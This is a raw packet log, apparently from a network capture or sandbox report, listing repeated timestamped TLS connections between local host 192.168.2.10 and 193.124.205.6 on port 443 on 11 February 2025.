                                                                                                                      Feb 11, 2025 17:33:59.016400099 CET44350012193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.018152952 CET50012443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.018199921 CET44350012193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.018245935 CET50012443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.266217947 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.266272068 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.266465902 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.269392014 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.269418001 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.876624107 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.876805067 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.878252983 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.878273010 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.878523111 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.880769968 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:33:59.880820990 CET44350013193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:33:59.880937099 CET50013443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.094152927 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.094209909 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.094283104 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.094547033 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.094563007 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.712599039 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.712693930 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.714108944 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.714119911 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.714375973 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.715884924 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.715930939 CET44350014193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.715985060 CET50014443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.922461033 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.922521114 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:00.922611952 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.922825098 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:00.922840118 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.531595945 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.531754017 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.654648066 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.654694080 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.655035973 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.656830072 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.656891108 CET44350015193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.657001019 CET50015443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.813391924 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.813438892 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:01.817576885 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.817756891 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:01.817769051 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.478161097 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.478245020 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.480194092 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.480206966 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.480467081 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.481878042 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.481915951 CET44350016193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.481966019 CET50016443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.641202927 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.641262054 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:02.641325951 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.641535997 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:02.641558886 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.268059969 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.268352032 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.270132065 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.270139933 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.270387888 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.271760941 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.271804094 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.271922112 CET44350017193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.272042990 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.272042990 CET50017443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.422534943 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.422602892 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:03.423525095 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.423785925 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:03.423814058 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.046535969 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.046881914 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.049289942 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.049299002 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.049571037 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.051897049 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.051948071 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.052092075 CET44350018193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.052423000 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.052423000 CET50018443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.183371067 CET50019443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.183417082 CET44350019193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.183487892 CET50019443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.191302061 CET50019443192.168.2.10193.124.205.6
                                                                                                                      Feb 11, 2025 17:34:04.191333055 CET44350019193.124.205.6192.168.2.10
                                                                                                                      Feb 11, 2025 17:34:04.820327044 CET44350019193.124.205.6192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 11, 2025 17:34:04.820401907 CET | 50019 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.822463036 CET | 50019 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.822477102 CET | 443 | 50019 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:04.822798014 CET | 443 | 50019 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:04.824738026 CET | 50019 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.824798107 CET | 443 | 50019 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:04.824846983 CET | 50019 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.922575951 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.922621012 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:04.922688007 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.922931910 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:04.922944069 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.524135113 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.524537086 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.527513027 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.527520895 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.527753115 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.528903961 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.528937101 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.529058933 CET | 443 | 50020 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.529146910 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.531542063 CET | 50020 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.625397921 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.625435114 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:05.626182079 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.626485109 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:05.626497030 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.243246078 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.243329048 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.245326996 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.245341063 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.245619059 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.247060061 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.247101068 CET | 443 | 50021 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.247152090 CET | 50021 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.328646898 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.328677893 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.328754902 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.329054117 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.329066992 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.937037945 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.937186003 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.939162970 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.939179897 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.939519882 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.941277027 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:06.941339970 CET | 443 | 50022 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:06.941421986 CET | 50022 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.016105890 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.016148090 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.016290903 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.016463995 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.016474962 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.626682043 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.626785994 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.629405975 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.629415035 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.629658937 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.631511927 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.631557941 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.631678104 CET | 443 | 50023 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.631684065 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.631764889 CET | 50023 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.703437090 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.703496933 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:07.703835011 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.705472946 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:07.705491066 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.351741076 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.351799965 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.354159117 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.354171991 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.354429007 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.355787039 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.355858088 CET | 443 | 50024 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.355912924 CET | 50024 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.422705889 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.422741890 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:08.422804117 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.423109055 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:08.423119068 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:09.035377026 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:09.035439968 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:09.037620068 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:09.037633896 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:09.037858963 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:09.039762020 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:09.039791107 CET | 443 | 50025 | 193.124.205.6 | 192.168.2.10
Feb 11, 2025 17:34:09.039841890 CET | 50025 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:09.097408056 CET | 50026 | 443 | 192.168.2.10 | 193.124.205.6
Feb 11, 2025 17:34:09.097445965 CET | 443 | 50026 | 193.124.205.6 |